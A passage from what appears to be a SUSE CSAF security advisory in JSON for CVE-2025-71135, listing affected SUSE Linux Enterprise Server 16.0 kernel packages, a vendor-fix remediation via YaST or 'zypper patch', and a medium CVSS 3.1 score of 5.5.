"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
